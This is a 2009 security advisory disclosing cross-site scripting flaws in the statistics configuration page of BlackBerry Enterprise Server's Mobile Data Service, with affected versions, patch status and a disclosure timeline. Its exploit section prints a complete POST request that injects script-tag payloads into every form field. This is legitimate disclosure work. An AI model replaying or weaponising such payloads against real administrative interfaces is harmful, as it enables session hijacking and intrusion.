ERNW Security Advisory 01-2009 XSS in Blackberries Mobile Data Service Connection Service Author: Michael Thumann 1. Summary The Blackberry Mobile Data Service Connection is vulnerable to several XSS attacks in the "Customize Statistics Page". 2. CVSS V2 Base Score : 3.5 (based on vendor rating) 3. Products affected Blackberry Enterprise Server: all versions prior to 4.1.6 MR4 4. Patch Availability : A patch is available from the vendor. 5. Details Injecting scripts (containing standard and encoded XSS attacks) into all the fields of the "customize statitics page" reveals that none of the fields are properly validated for malicious input and the output isn't sanitized. 6. Solution Update the affected products to the actual version. 7. Time-Line 16 Feb 2009: Discovery of the vulnerability 02 Mar 2009: Vulnerability reported to vendor 02 Mar 2009: Answer from vendor 16 Apr 2009: Patch available 16 Apr 2009: Public Disclosure 8. Exploit POST /admin/statistics/ConfigureStatistics HTTP/1.0 Cookie: JSESSIONID=.... Content-Length: 753 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: ... Content-Type: application/x-www-form-urlencoded Referer: http://x:8080/admin/statistics/ConfigureStatistics customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E& interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E& lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E &lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript% 3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript %3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C% 2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E &delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E& addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E& delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E& referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E 9. Thanks We would like to thank the guys from Blackberry for working together on this issue in a professional and responsible way. 10. Disclaimer The informations in this advisory are provided "AS IS" without warranty of any kind. In no event shall the authors be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages due to the misuse of any information provided in this advisory.